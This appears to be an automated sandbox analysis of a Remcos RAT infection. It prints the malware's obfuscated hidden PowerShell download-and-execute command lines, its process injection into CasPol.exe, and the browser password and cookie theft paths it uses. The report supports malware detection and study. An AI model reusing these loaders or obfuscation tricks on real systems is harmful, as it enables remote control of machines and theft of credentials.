8NyssaaQBtNyssaGENyssaZwBlNyssaC4NyssaagBwNyssaGcNyssaJwNyssa7NyssaCQNyssaYgBlNyssaG4NyssaegBvNyssaHQNyssaaNyssaBpNyssaG8NyssacNyssaB5NyssaHINyssaYQBuNyssaCNyssaNyssaPQNyssagNyssaE4NyssaZQB3NyssaC0NyssaTwBiNyssaGoNyssaZQBjNyssaHQNyssaINyssaBTNyssaHkNyssacwB0NyssaGUNyssabQNyssauNyssaE4NyssaZQB0NyssaC4NyssaVwBlNyssaGINyssaQwBsNyssaGkNyssaZQBuNyssaHQNyssaOwNyssakNyssaGINyssaYQB0NyssaGYNyssabwB3NyssaGwNyssaaQBuNyssaGcNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBiNyssaGUNyssabgB6NyssaG8NyssadNyssaBoNyssaGkNyssabwBwNyssaHkNyssacgBhNyssaG4NyssaLgBENyssaG8NyssadwBuNyssaGwNyssabwBhNyssaGQNyssaRNyssaBhNyssaHQNyssaYQNyssaoNyssaCQNyssabQBlNyssaHQNyssaYQBsNyssaGwNyssaYQBjNyssaHkNyssaYwBsNyssaGUNyssaKQNyssa7NyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaCNyssaNyssaPQNyssagNyssaFsNyssaUwB5NyssaHMNyssadNyssaBlNyssaG0NyssaLgBUNyssaGUNyssaeNyssaB0NyssaC4NyssaRQBuNyssaGMNyssabwBkNyssaGkNyssabgBnNyssaF0NyssaOgNyssa6NyssaFUNyssaVNyssaBGNyssaDgNyssaLgBHNyssaGUNyssadNyssaBTNyssaHQNyssacgBpNyssaG4NyssaZwNyssaoNyssaCQNyssaYgBhNyssaHQNyssaZgBvNyssaHcNyssabNyssaBpNyssaG4NyssaZwNyssapNyssaDsNyssaJNyssaBwNyssaG8NyssadNyssaBhNyssaHMNyssacwBpNyssaGYNyssaZQByNyssaG8NyssadQBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaPNyssaNyssa8NyssaEINyssaQQBTNyssaEUNyssaNgNyssa0NyssaF8NyssaUwBUNyssaEENyssaUgBUNyssaD4NyssaPgNyssanNyssaDsNyssaJNyssaBoNyssaGUNyssacgBiNyssaGkNyssadgBvNyssaHINyssaaQB0NyssaHkNyssaINyssaNyssa9NyssaCNyssaNyssaJwNyssa8NyssaDwNyssaQgBBNyssaFMNyssaRQNyssa2NyssaDQNyssaXwBFNyssaE4NyssaRNyssaNyssa+NyssaD4NyssaJwNyssa7NyssaCQNyssabgBhNyssaGINyssabwBiNyssaGUNyssacgB5NyssaCNyssaNyssaPQNyssagNyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaC4NyssaSQBuNyssaGQNyssaZ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\microsiphonula.js" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w hidden -ec iaajagkatgb2ae8aawbfac0augblafmadabtaguadaboag8azaagacaalqb1ahiasqagacaakaadiggadab0ahaaogavac8azablagealgbyaguabqb3ageadgblahmadwauagmabwbtac8aaaadicaacqagaakakwagaakahsbhahaacaavae0aeqbgagkababladaamgauab0giaajacaacqaracaacqadigoahsagaakaiaajacsaiaajab0gcwadicaacqapacaalqbpahuadabmagkababfacaacqadicqarqboahyaogbhahaacabkaeeavabhafwarwb0aggaaabgagyadqb0ahuaeqboahcalgbqahmahsagadsaiaajafmavabbahiavaagab0gjabfae4avga6ageauabqaeqaqqb0ageaxabhahqaaaboaeyazgb1ahqadqb5aggadwauagoacwadia== "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -w hidden -ec iaajagkatgb2ae8aawbfac0augblafmadabtaguadaboag8azaagacaalqb1ahiasqagacaakaadiggadab0ahaaogavac8azablagealgbyaguabqb3ageadgblahmadwauagmabwbtac8aaaadicaacqagaakakwagaakahsbhahaacaavae0aeqbgagkababladaamgauab0giaajacaacqaracaacqadigoahsagaakaiaajacsaiaajab0gcwadicaacqapacaalqbpahuadabmagkababfacaacqadicqarqboahyaogbhahaacabkaeeavabhafwarwb0aggaaabgagyadqb0ahuaeqboahcalgbqahmahsagadsaiaajafmavabbahiavaagab0gjabfae4avga6ageauabqaeqaqqb0ageaxabhahqaaaboaeyazgb1ahqadqb5aggadwauagoacwadia==
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command ""$codigo = 'jnyssablnyssahmnyssaywbhnyssahnyssanyssabwbsnyssag8nyssazwbpnyssahmnyssadnyssabznyssacnyssanyssapqnyssagnyssaccnyssaiwb4nyssacmnyssalgblnyssacmnyssayqbtnyssac8nyssaznyssabunyssagknyssaawnyssavnyssag0nyssabwbjnyssac4nyssadwbznyssagunyssadgbhnyssahcnyssabqblnyssahinyssalgbhnyssagunyssaznyssanyssavnyssac8nyssaogbwnyssacmnyssaiwbonyssaccnyssaownyssaknyssaginyssadqbtnyssahnyssanyssazqbynyssahmnyssainyssanyssa9nyssacnyssanyssajnyssablnyssahmnyssaywbhnyssahnyssanyssabwbsnyssag8nyssazwbpnyssahmnyssadnyssabznyssacnyssanyssalqbynyssagunyssacnyssabsnyssagenyssaywblnyssacnyssanyssajwnyssajnyssaccnyssalnyssanyssagnyssaccnyssadnyssanyssannyssadsnyssajnyssabtnyssagunyssadnyssabhnyssagwnyssabnyssabhnyssagmnyssaeqbjnyssagwnyssazqnyssagnyssad0nyssainyssanyssannyssaggnyssadnyssab0nyssahnyssanyssacwnyssa6nyssac8nyssalwbpnyssagenyssaonyssanyssawnyssadnyssanyssanwnyssawnyssadunyssalgb1nyssahmnyssalgbhnyssahinyssaywbonyssagknyssadgblnyssac4nyssabwbynyssagcnyssalwnyssaxnyssadqnyssalwbpnyssahqnyssazqbtnyssahmnyssalwbunyssagunyssadwbfnyssagknyssabqbhnyssagcnyssazqbfnyssadinyssamnyssanyssaynyssadunyssamnyssanyssaznyssadinyssannyssanyssavnyssag4nyssazqb3nyssaf8nyssaaqbtnyssagenyssazwblnyssac4nyssaagbwnyssagcnyssajwnyssa7nyssacqnyssaygblnyssag4nyssaegbvnyssahqnyssaanyssabpnyssag8nyssacnyssab5nyssahinyssayqbunyssacnyssanyssapqnyssagnyssae4nyssazqb3nyssac0nyssatwbinyssagonyssazqbjnyssahqnyssainyssabtnyssahknyssacwb0nyssagunyssabqnyssaunyssae4nyssazqb0nyssac4nyssavwblnyssaginyssaqwbsnyssagknyssazqbunyssahqnyssaownyssaknyssaginyssayqb0nyssagynyssabwb3nyssagwnyssaaqbunyssagcnyssainyssanyssa9nyssacnyssanyssajnyssabinyssagunyssabgb6nyssag8nyssadnyssabonyssagknyssabwbwnyssahknyssacgbhnyssag4nyssalgbenyssag8nyssadwbunyssagwnyssabwbhnyssagqnyssarnyssabhnyssahqnyssayqnyssaonyssacqnyssabqblnyssahqnyssayqbsnyssagwnyssayqbjnyssahknyssaywbsnyssagunyssakqnyssa7nyssacqnyssaywbhnyssahmnyssadnyssabynyssagunyssabgbznyssagknyssayqbsnyssacnyssanyssapqnyssagnyssafsnyssauwb5nyssahmnyssadnyssablnyssag0nyssalgbunyssagunyssaenyssab0nyssac4nyssarqbunyssagmnyssabwbknyssagknyssabgbnnyssaf0nyssaognyssa6nyssafunyssavnyssabgnyssadgnyssalgbhnyssagunyssadnyssabtnyssahqnyssacgbpnyssag4nyssazwnyssaonyssacqnyssaygbhnyssahqnyssazgbvnyssahcnyssabnyssabpnyssag4nyssazwnyssapnyssadsnyssajnyssabwnyssag8nyssadnyssabhnyssahmnyssacwbpnyssagynyssazqbynyssag8nyssadqbznyssacnyssanyssapqnyssagnyssaccnyssapnyssanyssa8nyssaeinyssaqqbtnyssaeunyssangnyssa0nyssaf8nyssauwbunyssaeenyssaugbunyssad4nyssapgnyssannyssadsnyssajnyssabonyssagunyssacgbinyssagknyssadgbvnyssahinyssaaqb0nyssahknyssainyssanyssa9nyssacnyssanyssajwnyssa8nyssadwnyssaqgbbnyssafmnyssarqnyssa2nyssadqnyssaxwbfnyssae4nyssarnyssanyssa+nyssad4nyssajwnyssa7nyssacqnyssabgbhnyssaginyssabwbinyssagunyssacgb5nyssacnyssanyssapqnyssagnyssacqnyssaywbhnyssahmnyssadnyssabynyssagunyssabgbznyssagknyssayqbsnyssac4nyssasqbunyssagqnyssaz
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w hidden -ec iaajagkatgb2ae8aawbfac0augblafmadabtaguadaboag8azaagacaalqb1ahiasqagacaakaadiggadab0ahaaogavac8azablagealgbyaguabqb3ageadgblahmadwauagmabwbtac8aaaadicaacqagaakakwagaakahsbhahaacaavae0aeqbgagkababladaamgauab0giaajacaacqaracaacqadigoahsagaakaiaajacsaiaajab0gcwadicaacqapacaalqbpahuadabmagkababfacaacqadicqarqboahyaogbhahaacabkaeeavabhafwarwb0aggaaabgagyadqb0ahuaeqboahcalgbqahmahsagadsaiaajafmavabbahiavaagab0gjabfae4avga6ageauabqaeqaqqb0ageaxabhahqaaaboaeyazgb1ahqadqb5aggadwauagoacwadia== " Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -w hidden -ec iaajagkatgb2ae8aawbfac0augblafmadabtaguadaboag8azaagacaalqb1ahiasqagacaakaadiggadab0ahaaogavac8azablagealgbyaguabqb3ageadgblahmadwauagmabwbtac8aaaadicaacqagaakakwagaakahsbhahaacaavae0aeqbgagkababladaamgauab0giaajacaacqaracaacqadigoahsagaakaiaajacsaiaajab0gcwadicaacqapacaalqbpahuadabmagkababfacaacqadicqarqboahyaogbhahaacabkaeeavabhafwarwb0aggaaabgagyadqb0ahuaeqboahcalgbqahmahsagadsaiaajafmavabbahiavaagab0gjabfae4avga6ageauabqaeqaqqb0ageaxabhahqaaaboaeyazgb1ahqadqb5aggadwauagoacwadia== Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command ""$codigo = 'jnyssablnyssahmnyssaywbhnyssahnyssanyssabwbsnyssag8nyssazwbpnyssahmnyssadnyssabznyssacnyssanyssapqnyssagnyssaccnyssaiwb4nyssacmnyssalgblnyssacmnyssayqbtnyssac8nyssaznyssabunyssagknyssaawnyssavnyssag0nyssabwbjnyssac4nyssadwbznyssagunyssadgbhnyssahcnyssabqblnyssahinyssalgbhnyssagunyssaznyssanyssavnyssac8nyssaogbwnyssacmnyssaiwbonyssaccnyssaownyssaknyssaginyssadqbtnyssahnyssanyssazqbynyssahmnyssainyssanyssa9nyssacnyssanyssajnyssablnyssahmnyssaywbhnyssahnyssanyssabwbsnyssag8nyssazwbpnyssahmnyssadnyssabznyssacnyssanyssalqbynyssagunyssacnyssabsnyssagenyssaywblnyssacnyssanyssajwnyssajnyssaccnyssalnyssanyssagnyssaccnyssadnyssanyssannyssadsnyssajnyssabtnyssagunyssadnyssabhnyssagwnyssabnyssabhnyssagmnyssaeqbjnyssagwnyssazqnyssagnyssad0nyssainyssanyssannyssaggnyssadnyssab0nyssahnyssanyssacwnyssa6nyssac8nyssalwbpnyssagenyssaonyssanyssawnyssadnyssanyssanwnyssawnyssadunyssalgb1nyssahmnyssalgbhnyssahinyssaywbonyssagknyssadgblnyssac4nyssabwbynyssagcnyssalwnyssaxnyssadqnyssalwbpnyssahqnyssazqbtnyssahmnyssalwbunyssagunyssadwbfnyssagknyssabqbhnyssagcnyssazqbfnyssadinyssamnyssanyssaynyssadunyssamnyssanyssaznyssadinyssannyssanyssavnyssag4nyssazqb3nyssaf8nyssaaqbtnyssagenyssazwblnyssac4nyssaagbwnyssagcnyssajwnyssa7nyssacqnyssaygblnyssag4nyssaegbvnyssahqnyssaanyssabpnyssag8nyssacnyssab5nyssahinyssayqbunyssacnyssanyssapqnyssagnyssae4nyssazqb3nyssac0nyssatwbinyssagonyssazqbjnyssahqnyssainyssabtnyssahknyssacwb0nyssagunyssabqnyssaunyssae4nyssazqb0nyssac4nyssavwblnyssaginyssaqwbsnyssagknyssazqbunyssahqnyssaownyssaknyssaginyssayqb0nyssagynyssabwb3nyssagwnyssaaqbunyssagcnyssainyssanyssa9nyssacnyssanyssajnyssabinyssagunyssabgb6nyssag8nyssadnyssabonyssagknyssabwbwnyssahknyssacgbhnyssag4nyssalgbenyssag8nyssadwbunyssagwnyssabwbhnyssagqnyssarnyssabhnyssahqnyssayqnyssaonyssacqnyssabqblnyssahqnyssayqbsnyssagwnyssayqbjnyssahknyssaywbsnyssagunyssakqnyssa7nyssacqnyssaywbhnyssahmnyssadnyssabynyssagunyssabgbznyssagknyssayqbsnyssacnyssanyssapqnyssagnyssafsnyssauwb5nyssahmnyssadnyssablnyssag0nyssalgbunyssagunyssaenyssab0nyssac4nyssarqbunyssagmnyssabwbknyssagknyssabgbnnyssaf0nyssaognyssa6nyssafunyssavnyssabgnyssadgnyssalgbhnyssagunyssadnyssabtnyssahqnyssacgbpnyssag4nyssazwnyssaonyssacqnyssaygbhnyssahqnyssazgbvnyssahcnyssabnyssabpnyssag4nyssazwnyssapnyssadsnyssajnyssabwnyssag8nyssadnyssabhnyssahmnyssacwbpnyssagynyssazqbynyssag8nyssadqbznyssacnyssanyssapqnyssagnyssaccnyssapnyssanyssa8nyssaeinyssaqqbtnyssaeunyssangnyssa0nyssaf8nyssauwbunyssaeenyssaugbunyssad4nyssapgnyssannyssadsnyssajnyssabonyssagunyssacgbinyssagknyssadgbvnyssahinyssaaqb0nyssahknyssainyssanyssa9nyssacnyssanyssajwnyssa8nyssadwnyssaqgbbnyssafmnyssarqnyssa2nyssadqnyssaxwbfnyssae4nyssarnyssanyssa+nyssad4nyssajwnyssa7nyssacqnyssabgbhnyssaginyssabwbinyssagunyssacgb5nyssacnyssanyssapqnyssagnyssacqnyssaywbhnyssahmnyssadnyssabynyssagunyssabgbznyssagknyssayqbsnyssac4nyssasqbunyssagqnyssaz Jump to behavior
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001266000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerGL
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001235000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000002.2669984293.0000000001266000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerst
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001266000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001266000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerGt
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001266000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr]
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001266000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001266000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managers
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001266000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managernet/
Source: CasPol.exe, 00000010.00000002.2669984293.000000000121B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000002.2669984293.0000000001249000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: CasPol.exe, 00000010.00000002.2669984293.000000000121B000.00000004.00000020.00020000.00000000.sdmp, logs.dat.16.dr Binary or memory string: [Program Manager]
Source: CasPol.exe, 00000010.00000002.2669984293.0000000001266000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerz
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00435034 cpuid 16_2_00435034
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoA, 16_2_0040F26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW, 16_2_004520E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW, 16_2_00452097
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW, 16_2_0045217D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 16_2_0045220A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW, 16_2_0044844E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW, 16_2_0045245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 16_2_00452583
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW, 16_2_0045268A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 16_2_00452757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW, 16_2_00448937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 16_2_00451E1F
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00404961 GetLocalTime,CreateEventA,CreateThread, 16_2_00404961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041BB0E GetComputerNameExW,GetUserNameW, 16_2_0041BB0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 16_2_004491DA
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.269403c7440.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.2669984293.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2669984293.000000000121B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2672109815.0000000002E5F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3088, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Contains functionality to steal Chrome passwords or cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 16_2_0040B59B
Contains functionality to steal Firefox passwords or cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 16_2_0040B6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: \key3.db 16_2_0040B6B5

Remote Access Functionality
barindex
Yara detected Remcos RAT
Source: Yara match File source: 16.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.269403c7440.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.2694057ec78.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.2669984293.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2668040543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2669984293.000000000121B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2672109815.0000000002E5F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 3088, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Contains functionality to launch a control a shell (cmd.exe)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: cmd.exe 16_2_00405091
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
